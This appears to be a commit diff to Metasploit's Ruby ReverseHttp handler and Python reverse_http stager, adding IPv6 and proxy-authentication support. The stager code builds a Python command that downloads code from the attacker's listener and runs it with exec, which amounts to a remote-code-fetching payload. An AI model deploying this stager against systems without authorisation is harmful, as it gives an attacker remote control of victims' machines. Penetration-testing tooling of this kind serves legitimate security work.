Adds IPv6 and option-related issues with the previous patch
This commit is contained in:
parent
0601946830
commit
2ab14e7e79
|
@ -58,18 +58,12 @@ module ReverseHttp
|
|||
], Msf::Handler::ReverseHttp)
|
||||
end
|
||||
|
||||
# Toggle for IPv4 vs IPv6 mode
|
||||
#
|
||||
def ipv6?
|
||||
Rex::Socket.is_ipv6?(datastore['LHOST'])
|
||||
end
|
||||
|
||||
# Determine where to bind the server
|
||||
#
|
||||
# @return [String]
|
||||
def listener_address
|
||||
if datastore['ReverseListenerBindAddress'].to_s.empty?
|
||||
bindaddr = (ipv6?) ? '::' : '0.0.0.0'
|
||||
if datastore['ReverseListenerBindAddress'].to_s == ""
|
||||
bindaddr = Rex::Socket.is_ipv6?(datastore['LHOST']) ? '::' : '0.0.0.0'
|
||||
else
|
||||
bindaddr = datastore['ReverseListenerBindAddress']
|
||||
end
|
||||
|
@ -77,14 +71,12 @@ module ReverseHttp
|
|||
bindaddr
|
||||
end
|
||||
|
||||
# Return a URI suitable for placing in a payload
|
||||
#
|
||||
# @return [String] A URI of the form +scheme://host:port/+
|
||||
def listener_uri
|
||||
if ipv6?
|
||||
listen_host = "[#{listener_address}]"
|
||||
else
|
||||
listen_host = listener_address
|
||||
end
|
||||
"#{scheme}://#{listen_host}:#{datastore['LPORT']}/"
|
||||
uri_host = Rex::Socket.is_ipv6?(listener_address) ? "[#{listener_address}]" : listener_address
|
||||
"#{scheme}://#{uri_host}:#{datastore['LPORT']}/"
|
||||
end
|
||||
|
||||
# Return a URI suitable for placing in a payload.
|
||||
|
@ -192,13 +184,17 @@ protected
|
|||
info[:port] = (datastore['PROXY_PORT'] || 8080).to_i
|
||||
info[:type] = datastore['PROXY_TYPE'].to_s
|
||||
|
||||
if info[:port] == 80
|
||||
info[:info] = info[:host]
|
||||
else
|
||||
info[:info] = "#{info[:host]}:#{info[:port]}"
|
||||
uri_host = info[:host]
|
||||
|
||||
if Rex::Socket.is_ipv6?(uri_host)
|
||||
uri_host = "[#{info[:host]}]"
|
||||
end
|
||||
|
||||
if info[:type] == "HTTP"
|
||||
info[:info] = "#{uri_host}:#{info[:port]}"
|
||||
|
||||
if info[:type] == "SOCKS"
|
||||
info[:info] = "socks=#{info[:info]}"
|
||||
else
|
||||
info[:info] = "http://#{info[:info]}"
|
||||
if datastore['PROXY_USERNAME'].to_s != ""
|
||||
info[:username] = datastore['PROXY_USERNAME'].to_s
|
||||
|
@ -206,8 +202,6 @@ protected
|
|||
if datastore['PROXY_PASSWORD'].to_s != ""
|
||||
info[:password] = datastore['PROXY_PASSWORD'].to_s
|
||||
end
|
||||
else
|
||||
info[:info] = "socks=#{info[:info]}"
|
||||
end
|
||||
|
||||
@proxy_settings = info
|
||||
|
@ -242,7 +236,7 @@ protected
|
|||
blob.sub!('HTTP_COMMUNICATION_TIMEOUT = 300', "HTTP_COMMUNICATION_TIMEOUT = #{datastore['SessionCommunicationTimeout']}")
|
||||
blob.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(datastore['MeterpreterUserAgent'])}'")
|
||||
|
||||
if @proxy_settings[:host] && @proxy_settings[:type] == "HTTP"
|
||||
if @proxy_settings[:host]
|
||||
blob.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(@proxy_settings[:info])}'")
|
||||
end
|
||||
|
||||
|
|
|
@ -28,6 +28,8 @@ module Metasploit3
|
|||
[
|
||||
OptString.new('PROXY_HOST', [false, "The proxy server's IP address"]),
|
||||
OptPort.new('PROXY_PORT', [true, "The proxy port to connect to", 8080 ]),
|
||||
OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentication"]),
|
||||
OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentication"])
|
||||
], Msf::Handler::ReverseHttp)
|
||||
end
|
||||
|
||||
|
@ -41,21 +43,32 @@ module Metasploit3
|
|||
txt.gsub('\\', '\\'*4).gsub('\'', %q(\\\'))
|
||||
}
|
||||
|
||||
target_url = 'http://'
|
||||
target_url << lhost
|
||||
if Rex::Socket.is_ipv6?(lhost)
|
||||
target_url = "http://[#{lhost}]"
|
||||
else
|
||||
target_url = "http://#{lhost}"
|
||||
end
|
||||
|
||||
target_url << ':'
|
||||
target_url << datastore['LPORT'].to_s
|
||||
target_url << '/'
|
||||
target_url << generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITP)
|
||||
|
||||
proxy_host = datastore['PROXY_HOST'].to_s
|
||||
proxy_port = datastore['PROXY_PORT'].to_i
|
||||
|
||||
cmd = "import sys\n"
|
||||
if datastore['PROXY_HOST'].to_s == ''
|
||||
if proxy_host == ''
|
||||
cmd << "o=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['build_opener']).build_opener()\n"
|
||||
else
|
||||
proxy_url = "http://#{datastore['PROXY_HOST']}:#{datastore['PROXY_PORT']}"
|
||||
proxy_url = Rex::Socket.is_ipv6?(proxy_host) ?
|
||||
"http://[#{proxy_host}]:#{proxy_port}" :
|
||||
"http://#{proxy_host}:#{proxy_port}"
|
||||
|
||||
cmd << "ul=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['ProxyHandler','build_opener'])\n"
|
||||
cmd << "o=ul.build_opener(ul.ProxyHandler({'http':'#{var_escape.call(proxy_url)}'}))\n"
|
||||
end
|
||||
|
||||
cmd << "o.addheaders=[('User-Agent','#{var_escape.call(datastore['MeterpreterUserAgent'])}')]\n"
|
||||
cmd << "exec(o.open('#{target_url}').read())\n"
|
||||
|
||||
|
|
Loading…
Reference in New Issue